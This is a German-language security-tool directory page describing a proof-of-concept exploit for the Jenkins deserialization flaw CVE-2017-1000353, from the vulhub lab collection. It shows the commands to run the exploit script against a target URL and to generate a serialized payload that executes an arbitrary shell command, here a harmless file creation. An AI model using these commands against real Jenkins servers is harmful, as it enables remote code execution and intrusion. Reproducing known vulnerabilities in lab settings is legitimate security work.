Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/vulhub/cve-2017-1000353
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

Repository anzeigen
5762vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-1000353 POC

Wie reproduziert man die Jenkins CVE-2017-1000353?

Klonen Sie dieses Repository und verwenden Sie das vorgefertigte Payload jenkins_poc.ser mit folgendem Befehl:

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

Dann wird der Befehl touch /tmp/success ausgeführt.

Anforderungen an die Java-Version

Wichtig: Die Payload-Generierung ist abhängig von der Java-Version. Sie wurde erfolgreich mit openjdk:8u292 getestet. Andere Java-Versionen funktionieren möglicherweise nicht korrekt für die Payload-Generierung und Ausnutzung.

Wie generiert man das Payload jenkins_poc.ser?

Laden Sie CVE-2017-1000353-SNAPSHOT-all.jar herunter.

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Wenn Sie Docker verwenden, können Sie den folgenden Befehl nutzen, um die Kompatibilität sicherzustellen:

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Referenz

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

Tool herunterladen